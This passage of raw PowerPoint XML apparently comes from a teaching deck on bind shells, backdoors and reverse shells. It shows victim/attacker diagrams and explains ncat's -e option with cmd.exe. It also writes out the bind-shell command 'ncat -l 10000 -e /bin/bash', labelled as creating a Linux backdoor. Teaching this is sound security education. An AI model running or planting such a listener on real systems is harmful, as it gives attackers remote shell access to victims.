              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="4947656"/>
              <a:ext cx="1379383" cy="1529499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3377" dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="3377" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012254" y="8141006"/>
              <a:ext cx="1379383" cy="1529499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3377"/>
                <a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351927" y="6095079"/>
              <a:ext cx="3841634" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>puts input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266198"/>
              <a:ext cx="4764401" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2133" dirty="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="2133" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675751" y="3705465"/>
            <a:ext cx="1357165" cy="870848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774914" y="4722416"/>
            <a:ext cx="851932" cy="674832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9800404" y="4675773"/>
            <a:ext cx="1097577" cy="674832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attac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4445" y="1514459"/>
            <a:ext cx="990052" cy="990052"/>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p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1561278" y="2009485"/>
            <a:ext cx="3353167" cy="1439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74914" y="1985521"/>
            <a:ext cx="3100220" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a hidden communication channel (backdoor)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793921" y="1809876"/>
            <a:ext cx="3132976" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939975" y="2009485"/>
            <a:ext cx="4112859" cy="1439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95B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10986207" y="2048722"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10977567" y="2039722"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198438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D4BDF-0DE5-09BD-9D84-5B31B3A1A165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outline</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28C48D4-C650-EA24-ED01-6D99CDEDF638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335825532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4836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082" y="683666"/>
            <a:ext cx="4483725" cy="1105055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86082" y="1924968"/>
            <a:ext cx="4166329" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Server listens port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: program to execute after connection occurs, connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502808" y="0"/>
            <a:ext cx="5689192" cy="6394221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701377" y="1236193"/>
            <a:ext cx="1684075" cy="2110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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="324536" y="6017257"/>
            <a:ext cx="4675064" cy="376966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="36363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0" rIns="0" bIns="95220" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324537" y="205173"/>
            <a:ext cx="2340641" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start listener first</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2587511" y="436006"/>
            <a:ext cx="77667" cy="70425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4252411" y="126386"/>
            <a:ext cx="2024732" cy="318100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start Client second</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264777" y="444486"/>
            <a:ext cx="1238032" cy="23918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3E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4451087" y="4734999"/>
              <a:ext cx="1440" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4442447" y="4725999"/>
                <a:ext cx="19080" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3318379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29" name="Straight Connector 28">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Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507067" y="4050833"/>
            <a:ext cx="7766936" cy="1096899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A new type of backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507067" y="1397000"/>
            <a:ext cx="7766936" cy="2653836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
